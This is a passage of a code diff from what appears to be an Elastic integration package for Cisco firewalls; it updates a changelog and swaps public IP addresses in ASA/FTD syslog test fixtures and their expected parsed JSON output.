2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip +2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip diff --git a/packages/cisco/changelog.yml b/packages/cisco/changelog.yml index 7f22d87b70d..b7d42588364 100644 --- a/packages/cisco/changelog.yml +++ b/packages/cisco/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.12.4" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.12.3" changes: - description: Update Title and Description. diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log index 0c3aef67223..2c96d1eec05 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log @@ -1,38 +1,38 @@ -May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500) -May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500) -May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3 +May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500) +May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500) +May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3 May 5 17:51:17 dev01: %FTD-7-609002: Teardown local-host net:192.168.2.2 duration 0:00:00 May 5 17:51:17 dev01: %FTD-7-609001: Built local-host net:192.168.2.2 -May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 1 -May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (8.8.8.8/111) to fw111:192.168.2.2/111 (8.8.5.4/111) +May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 1 +May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (81.2.69.144/111) to fw111:192.168.2.2/111 (81.2.69.144/111) May 5 17:51:17 dev01: %FTD-6-805002: TCP Flow is no longer offloaded for connection 941243214 from net:10.192.18.4/51261 (10.192.18.4/51261) to fw109:10.192.70.66/443 (10.192.70.66/443) May 5 17:51:17 dev01: %FTD-7-710005: UDP request discarded from 192.168.2.2/68 to fw111:10.10.10.10/67 May 5 17:51:17 dev01: %FTD-6-303002: FTP connection from net:192.168.2.2/63656 to fw111:10.192.18.4/21, user testuser Stored file /export/home/sysm/ftproot/sdsdsds/tmp.log May 5 17:51:17 dev01: %FTD-7-710006: VRRP request discarded from 192.168.2.2 to fw111:192.18.4 -May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 8.8.8.8/10872. -May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 8.8.8.8/2 laddr 10.10.10.10/2 type 8 code 0 +May 5 17:51:17 dev01: %FTD-4-313005: No matching connection for ICMP error message: icmp src fw111:10.192.33.100 dst fw111:192.18.4 (type 3, code 3) on fw111 interface. Original IP payload: udp src 192.18.4/53 dst 81.2.69.144/10872. +May 5 18:16:21 dev01: %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.2/0 gaddr 81.2.69.144/2 laddr 10.10.10.10/2 type 8 code 0 May 5 18:22:35 dev01: %ASA-7-609001: Built local-host net:10.10.10.10 May 5 18:24:31 dev01: %ASA-7-609002: Teardown local-host identity:10.10.10.10 duration 0:00:00 -May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 10.192.46.90/0 -May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3 +May 5 18:29:32 dev01: %ASA-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 10.192.46.90/0 +May 5 18:29:32 dev01: %ASA-6-302020: Built outbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3 May 5 18:29:32 dev01: %ASA-6-302014: Teardown TCP connection 2960892904 for out111:10.10.10.10/443 to fw111:192.168.2.2/55225 duration 0:00:00 bytes 0 TCP Reset-I -May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (8.8.8.8/80) to net:10.10.10.10/54839 (8.8.8.8/54839) +May 5 18:29:32 dev01: %ASA-6-302013: Built outbound TCP connection 1588662 for intfacename:192.168.2.2/80 (81.2.69.144/80) to net:10.10.10.10/54839 (81.2.69.144/54839) May 5 18:29:32 dev01: %ASA-6-302012: Teardown dynamic UDP translation from fw111:10.10.10.10/54230 to out111:192.168.2.2/54230 duration 0:00:00 May 5 18:40:50 dev01: %ASA-4-313004: Denied ICMP type=0, from laddr 10.10.10.10 on interface fw502 to 192.168.2.2: no matching session May 5 18:40:50 dev01: %ASA-6-305011: Built dynamic TCP translation from fw111:10.10.10.10/57006 to out111:192.168.2.2/57006 May 5 18:40:50 dev01: %ASA-2-106001: Inbound TCP connection denied from 192.168.2.2/43803 to 10.10.10.10/14322 flags SYN on interface out111 -May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:192.186.2.2/53356 duration 0:02:04 bytes 64585 -May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638) -May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (8.8.8.4/161) to net:192.168.2.2/22638 (8.8.8.8/22638) +May 5 18:40:50 dev01: %ASA-2-302016: Teardown UDP connection 1671727 for intfacename:10.10.10.10/161 to net:1192.168.2.2/53356 duration 0:02:04 bytes 64585 +May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638) +May 5 18:40:50 dev01: %ASA-2-302015: Built outbound UDP connection 1743372 for intfacename:10.10.10.10/161 (81.2.69.144/161) to net:192.168.2.2/22638 (81.2.69.144/22638) May 5 18:40:50 dev01: %ASA-4-106023: Deny tcp src fw111:10.10.10.10/64388 dst out111:192.168.2.2/443 by access-group "out1111_access_out" [0x47e21ef4, 0x47e21ef4] May 5 18:40:50 dev01: %ASA-4-106021: Deny TCP reverse path check from 192.168.2.2 to 10.10.10.10 on interface fw111 May 5 19:02:58 dev01: %ASA-2-106006: Deny inbound UDP from 192.168.2.2/65020 to 10.10.10.10/65020 on interface fw111 May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/53089 to 10.10.10.10/443 flags FIN PSH ACK on interface out111 May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/17127 to 10.10.10.10/443 flags PSH ACK on interface out111 May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/24223 to 10.10.10.10/443 flags RST on interface fw111 -May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051) -May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051) -May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (8.8.8.8/10051) +May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051) +May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051) +May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (81.2.69.144/10051) May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for fw111:10.10.10.10/39210 to net:192.168.2.2/10051 duration 0:00:00 forwarded bytes 0 Cluster flow with CLU closed on owner May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for net:10.10.10.10/10051 to unknown:192.168.2.2/39222 duration 0:00:00 forwarded bytes 0 Forwarding or redirect flow removed to create director or backup flow May 5 19:03:27 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list fw211111_access_out brief @@ -40,10 +40,10 @@ May 5 19:02:26 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp ptaaac/192.168.2.2(62157) -> fw111/10.10.10.10(3452) hit-cnt 1 first hit [0x38ff326b, 0x00000000] May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp net/192.168.2.2(49033) -> fw111/10.10.10.10(6007) hit-cnt 2 300-second interval [0x38ff326b, 0x00000000] May 5 19:02:26 dev01: %ASA-6-302027: Teardown stub ICMP connection for fw1111:10.10.10.10/6426 to net:192.168.2.2/0 duration 1:00:04 forwarded bytes 56 Cluster flow with CLU closed on owner -May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (8.8.8.8) +May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (81.2.69.144) May 5 19:02:26 dev01: %ASA-7-710005: UDP request discarded from 10.10.10.10/1985 to net:192.168.2.2/1985 May 5 19:02:26 dev01: %ASA-6-302025: Teardown stub UDP connection for net:192.168.2.2/123 to unknown:10.10.10.10/123 duration 0:01:00 forwarded bytes 48 Cluster flow with CLU removed from due to idle timeout -May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (8.8.8.8/123) +May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (81.2.69.144/123) May 5 19:02:26 dev01: %ASA-3-106014: Deny inbound icmp src fw111:10.10.10.10 dst fw111:10.10.10.10(type 8, code 0) May 5 19:02:25 dev01: %ASA-4-733100: [192.168.2.2] drop rate-1 exceeded. Current burst rate is 0 per second, max configured rate is -4; Current average rate is 7 per second, max configured rate is -4; Cumulative total count is 9063 May 5 19:02:25 dev01: %ASA-3-106010: Deny inbound sctp src fw111:10.10.10.10/5114 dst fw111:10.10.10.10/2 @@ -52,9 +52,9 @@ Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL 10.20.30.40:http: Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL someuser@10.20.30.40:http://10.20.30.40/IOFUHSIU98[0] Apr 27 17:54:52 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL 10.20.30.40:http://10.20.30.40/some/longer/url-asd-er9789870[0]_=23 Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL someuser@10.20.30.40:http://10.20.30.40/ -Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:1.2.3.4/54242 to server.deflan:2.3.4.5/9101 duration 1:00:02 bytes 245 Connection timeout +Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:81.2.69.144/54242 to server.deflan:81.2.69.144/9101 duration 1:00:02 bytes 245 Connection timeout Apr 27 02:02:02 dev01: %ASA-4-106023: Deny tcp src outside:10.10.10.2/56444 dst srv:192.168.2.2/51635(testhostname.domain) by access-group "global_access_1" -Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -> OUTSIDE/195.122.12.242(53) hit-cnt 1 first hit [0x16847359, 0x00000000] +Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -> OUTSIDE/192.168.157.61(53) hit-cnt 1 first hit [0x16847359, 0x00000000] Apr 27 02:03:03 dev01: %ASA-5-111004: console end configuration: OK Apr 27 02:03:03 dev01: %ASA-5-111010: User 'enable_15', running 'CLI' from IP 10.10.0.87, executed 'clear' Apr 27 02:03:03 dev01: %ASA-5-502103: User priv level changed: Uname: enable_15 From: 1 To: 15 @@ -62,24 +62,24 @@ Apr 27 02:03:03 dev01: %ASA-6-605004: Login denied from 10.10.1.212/51923 to FCD Apr 27 02:03:03 dev01: %ASA-6-611102: User authentication failed: IP address: 10.10.0.87, Uname: admin Apr 27 02:03:03 dev01: %ASA-6-605005: Login permitted from 10.10.0.87/6651 to FCD-FS-LAN:10.10.1.254/ssh for user "admin" Apr 27 02:03:03 dev01: %ASA-6-611101: User authentication succeeded: IP address: 10.10.0.87, Uname: admin -Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 91.240.17.178, IP = 91.240.17.178, Security negotiation complete for LAN-to-LAN Group (91.240.17.178) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d -Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 91.240.17.178, Username = 91.240.17.178, IP = 91.240.17.178, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested +Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 81.2.69.144, IP = 81.2.69.144, Security negotiation complete for LAN-to-LAN Group (81.2.69.144) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d +Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 81.2.69.144, Username = 81.2.69.144, IP = 81.2.69.144, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested Apr 27 02:03:03 dev01: %ASA-4-722051: Group User IP <192.168.50.3> IPv4 Address <192.168.50.5> IPv6 address <::> assigned to session -Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 8.8.8.8 WebVPN session terminated: User Requested. +Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 81.2.69.144 WebVPN session terminated: User Requested. Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User alice IP 192.168.50.1 WebVPN session terminated: Idle timeout. -Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 104.46.88.19/6370 to outside:195.74.114.34/23 -Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:91.240.17.178/8888 to destinationInterfaceName:192.168.2.2/123123 locally -Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:91.240.17.138/8888 to destinationInterfaceName:192.168.2.2/514514 -Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:91.240.17.178/7777 to 192.168.2.2/123412 -Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:91.240.17.178/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number -Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been created. -Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been deleted. -Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request -Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database -Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.128.1.1, PHASE 2 COMPLETED (msgid=bbe383e88) -Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.64.157.61, Duplicate first packet detected. Ignoring packet. -Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable! +Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 81.2.69.144/6370 to outside:192.168.157.61/23 +Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/123123 locally +Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/514514 +Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:81.2.69.144/7777 to 192.168.2.2/123412 +Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:81.2.69.144/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number +Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been created. +Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been deleted. +Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request +Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database +Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.168.1.1, PHASE 2 COMPLETED (msgid=bbe383e88) +Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.168.157.61, Duplicate first packet detected. Ignoring packet. +Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable! Apr 27 2020 02:03:03 dev01: %ASA-6-713904: All IPSec SA proposals found unacceptable! -Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.128.1.1, All IPSec SA proposals found unacceptable! +Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.168.1.1, All IPSec SA proposals found unacceptable! Apr 27 2020 02:03:03 dev01: %ASA-6-713902: Group = 100.60.140.10, All IPSec SA proposals found unacceptable! -Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable! +Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable! diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log-expected.json index 1d02ce1233b..e7edee78768 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-additional-messages.log-expected.json @@ -6,7 +6,7 @@ }, "destination": { "nat": { - "ip": "8.8.5.4" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "port": 53500, @@ -14,7 +14,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "port": 53500, @@ -54,9 +54,8 @@ ], "ip": [ "10.10.10.10", - "8.8.8.8", - "192.168.2.2", - "8.8.5.4" + "81.2.69.144", + "192.168.2.2" ] }, "host": { @@ -64,8 +63,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086480145Z", - "original": "May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)", + "ingested": "2021-12-09T13:31:25.162829200Z", + "original": "May 5 17:51:17 dev01: %FTD-6-302013: Built inbound TCP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -80,8 +79,8 @@ "asa": { "destination_interface": "fw111", "mapped_source_port": 53500, - "mapped_destination_ip": "8.8.5.4", - "mapped_source_ip": "8.8.8.8", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "111111111", "source_interface": "net", "mapped_destination_port": 53500 @@ -94,7 +93,7 @@ }, "destination": { "nat": { - "ip": "8.8.5.4" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "port": 53500, @@ -102,7 +101,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "port": 53500, @@ -142,9 +141,8 @@ ], "ip": [ "10.10.10.10", - "8.8.8.8", - "192.168.2.2", - "8.8.5.4" + "81.2.69.144", + "192.168.2.2" ] }, "host": { @@ -152,8 +150,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086488034Z", - "original": "May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (8.8.8.8/53500) to fw111:192.168.2.2/53500 (8.8.5.4/53500)", + "ingested": "2021-12-09T13:31:25.162839Z", + "original": "May 5 17:51:17 dev01: %FTD-6-302015: Built inbound UDP connection 111111111 for net:10.10.10.10/53500 (81.2.69.144/53500) to fw111:192.168.2.2/53500 (81.2.69.144/53500)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -168,8 +166,8 @@ "asa": { "destination_interface": "fw111", "mapped_source_port": 53500, - "mapped_destination_ip": "8.8.5.4", - "mapped_source_ip": "8.8.8.8", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "111111111", "source_interface": "net", "mapped_destination_port": 53500 @@ -186,7 +184,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "ip": "192.168.2.2" @@ -214,7 +212,7 @@ ], "ip": [ "192.168.2.2", - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -223,8 +221,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086490223Z", - "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 3", + "ingested": "2021-12-09T13:31:25.162845100Z", + "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 3", "code": "302020", "kind": "event", "action": "flow-expiration", @@ -238,7 +236,7 @@ }, "cisco": { "asa": { - "mapped_source_ip": "8.8.8.8", + "mapped_source_ip": "81.2.69.144", "icmp_type": 3, "icmp_code": 3 } @@ -284,7 +282,7 @@ "event": { "severity": 7, "duration": 0, - "ingested": "2021-07-19T09:05:57.086492152Z", + "ingested": "2021-12-09T13:31:25.162851100Z", "original": "May 5 17:51:17 dev01: %FTD-7-609002: Teardown local-host net:192.168.2.2 duration 0:00:00", "code": "609002", "kind": "event", @@ -344,7 +342,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:05:57.086493854Z", + "ingested": "2021-12-09T13:31:25.162855800Z", "original": "May 5 17:51:17 dev01: %FTD-7-609001: Built local-host net:192.168.2.2", "code": "609001", "kind": "event", @@ -373,7 +371,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "ip": "192.168.2.2" @@ -401,7 +399,7 @@ ], "ip": [ "192.168.2.2", - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -410,8 +408,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086495542Z", - "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 8.8.8.8/0 laddr 192.168.2.2/0 type 3 code 1", + "ingested": "2021-12-09T13:31:25.162861200Z", + "original": "May 5 17:51:17 dev01: %FTD-6-302020: Built inbound ICMP connection for faddr 10.10.10.10/0 gaddr 81.2.69.144/0 laddr 192.168.2.2/0 type 3 code 1", "code": "302020", "kind": "event", "action": "flow-expiration", @@ -425,7 +423,7 @@ }, "cisco": { "asa": { - "mapped_source_ip": "8.8.8.8", + "mapped_source_ip": "81.2.69.144", "icmp_type": 3, "icmp_code": 1 } @@ -437,7 +435,7 @@ }, "destination": { "nat": { - "ip": "8.8.5.4" + "ip": "81.2.69.144" }, "address": "192.168.2.2", "port": 111, @@ -445,7 +443,7 @@ }, "source": { "nat": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "address": "10.10.10.10", "port": 111, @@ -483,9 +481,8 @@ ], "ip": [ "10.10.10.10", - "8.8.8.8", - "192.168.2.2", - "8.8.5.4" + "81.2.69.144", + "192.168.2.2" ] }, "host": { @@ -493,8 +490,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086497218Z", - "original": "May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (8.8.8.8/111) to fw111:192.168.2.2/111 (8.8.5.4/111)", + "ingested": "2021-12-09T13:31:25.162867800Z", + "original": "May 5 17:51:17 dev01: %FTD-6-805001: Offloaded TCP Flow for connection 111111111 from fw111:10.10.10.10/111 (81.2.69.144/111) to fw111:192.168.2.2/111 (81.2.69.144/111)", "code": "805001", "kind": "event", "action": "firewall-rule", @@ -509,8 +506,8 @@ "asa": { "destination_interface": "fw111", "mapped_source_port": 111, - "mapped_destination_ip": "8.8.5.4", - "mapped_source_ip": "8.8.8.8", + "mapped_destination_ip": "81.2.69.144", + "mapped_source_ip": "81.2.69.144", "connection_id": "111111111", "source_interface": "fw111", "mapped_destination_port": 111 @@ -572,7 +569,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086498881Z", + "ingested": "2021-12-09T13:31:25.162873700Z", "original": "May 5 17:51:17 dev01: %FTD-6-805002: TCP Flow is no longer offloaded for connection 941243214 from net:10.192.18.4/51261 (10.192.18.4/51261) to fw109:10.192.70.66/443 (10.192.70.66/443)", "code": "805002", "kind": "event", @@ -646,7 +643,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:05:57.086500586Z", + "ingested": "2021-12-09T13:31:25.162880900Z", "original": "May 5 17:51:17 dev01: %FTD-7-710005: UDP request discarded from 192.168.2.2/68 to fw111:10.10.10.10/67", "code": "710005", "kind": "event", @@ -728,7 +725,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086502259Z", + "ingested": "2021-12-09T13:31:25.162886600Z", "original": "May 5 17:51:17 dev01: %FTD-6-303002: FTP connection from net:192.168.2.2/63656 to fw111:10.192.18.4/21, user testuser Stored file /export/home/sysm/ftproot/sdsdsds/tmp.log", "code": "303002", "kind": "event", @@ 